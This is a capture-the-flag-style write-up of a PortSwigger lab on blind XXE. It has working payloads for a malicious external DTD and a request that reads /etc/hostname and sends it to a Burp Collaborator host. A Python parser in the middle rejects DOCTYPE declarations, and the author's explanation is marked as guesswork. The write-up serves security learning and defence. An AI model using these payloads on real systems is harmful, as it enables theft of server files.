Lab: Exploiting blind XXE to exfiltrate data using a malicious external DTD

tags: Portswigger Web Security Academy Web
  • Description: This lab has a “Check stock” feature that parses XML input but does not display the result.
  • Goal: To solve the lab, exfiltrate the contents of the /etc/hostname file.
  • Hint: To prevent the Academy platform being used to attack third parties, our firewall blocks interactions between the labs and arbitrary external systems. To solve the lab, you must use the provided exploit server and/or Burp Collaborator’s default public server.

Recon

  1. Use the previous method

    :::spoiler Payload

    ```xml
    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM "http://d3hr4hyf51vbe69iuzp4czdzuq0ho6.burpcollaborator.net"> %xxe; ]>
    <stockCheck>
        <productId>
            1
        </productId>
        <storeId>
            1
        </storeId>
    </stockCheck>
    ```

    :::

    The previous method cannot achieve our goal, which is exfiltrating the server's hostname.

  2. A new method: following the hint, we can use the exploit server they provide.
    1. Copy the Collaborator payload.
    2. Complete the malicious server payload and store it:

       ```dtd
       <!ENTITY % file SYSTEM "file:///etc/hostname">
       <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://BURP-COLLABORATOR-SUBDOMAIN/?x=%file;'>">
       %eval;
       %exfil;
       ```

    3. Complete the intercepted packet payload: intercept the request sent when you click the Check stock button on any product page, and replace YOUR-DTD-URL with your malicious server URL, e.g. https://exploit-{YOUR-RANDOM-URL}.exploit-server.net/exploit

       ```xml
       <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]>
       ```

    4. Send the packet and observe the result in Collaborator.
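The defensive counterpart to this procedure, as an added example that is not code from the lab or from PortSwigger: a stock-check parser built on Python's standard-library expat that rejects the request as soon as it sees `<!DOCTYPE`, so the `%xxe;` reference never causes the external DTD to be fetched. The two sample requests and the exploit-server placeholder URL are constructed for the example.

```python
import xml.parsers.expat as expat

class DtdForbidden(ValueError):
    """Raised as soon as a DOCTYPE or entity declaration is seen."""

def parse_stock_check(xml_text: str) -> dict:
    """Return {'productId': int, 'storeId': int}; raise DtdForbidden on any DTD."""
    parser = expat.ParserCreate()
    parser.buffer_text = True
    # Never read an external DTD subset or expand parameter entities like %xxe;
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    def forbid_doctype(name, sysid, pubid, has_internal_subset):
        raise DtdForbidden(f"DOCTYPE {name!r} rejected (system id {sysid!r})")

    def forbid_entity(name, is_param, value, base, sysid, pubid, notation):
        raise DtdForbidden(f"entity {name!r} rejected (system id {sysid!r})")

    def forbid_external(context, base, sysid, pubid):
        raise DtdForbidden(f"external fetch of {sysid!r} rejected")

    # DOCTYPE is seen before any entity is declared, so the attacker's DTD URL
    # is never requested; the other two handlers are defence in depth.
    parser.StartDoctypeDeclHandler = forbid_doctype
    parser.EntityDeclHandler = forbid_entity
    parser.ExternalEntityRefHandler = forbid_external
    fields, stack = {}, []
    parser.StartElementHandler = lambda tag, attrs: stack.append(tag)
    parser.EndElementHandler = lambda tag: stack.pop()

    def on_text(data):
        if stack and stack[-1] in ("productId", "storeId") and data.strip():
            fields[stack[-1]] = int(data.strip())

    parser.CharacterDataHandler = on_text
    parser.Parse(xml_text, True)
    return fields

def is_safe(xml_text: str) -> bool:
    """True if the body parsed without touching a DTD, False if it was rejected."""
    try:
        parse_stock_check(xml_text)
        return True
    except DtdForbidden:
        return False

# Constructed samples: a normal stock check and the lab's packet payload (placeholder URL).
BENIGN = '<?xml version="1.0"?><stockCheck><productId>1</productId><storeId>2</storeId></stockCheck>'
BLIND_XXE = ('<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM '
             '"https://exploit-PLACEHOLDER.exploit-server.net/exploit"> %xxe;]>'
             '<stockCheck><productId>1</productId><storeId>2</storeId></stockCheck>')
```

Because the rejection happens in the DOCTYPE handler, the decision is made before the parser reaches the `%xxe;` reference, which is the point at which a DTD-enabled parser in the lab would contact the exploit server.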

Exp - Guesswork

The full flow is a bit complicated. My own understanding is that the paused packet, because of the parameter entity reference, triggers %xxe and interacts with the malicious server; the malicious server can then use %eval and %exfil to get the SYSTEM "file:///etc/hostname" directive executed, and the result is sent back to Burp Suite as a GET parameter of the Collaborator request, so we can see what the hostname is in Burp Suite's Collaborator.

:::spoiler Malicious Server Payload

```dtd
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://ehzsiicgj29cs7nj8035q0r08reh26.burpcollaborator.net/?x=%file;'>">
%eval;
%exfil;
```

:::

:::spoiler Packet Payload

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://exploit-0aae00dc044ebfc38406a3db012f0055.exploit-server.net/exploit"> %xxe;]>
<stockCheck>
    <productId>
        1
    </productId>
    <storeId>
        1
    </storeId>
</stockCheck>
```

:::

:::spoiler Success Screenshot

:::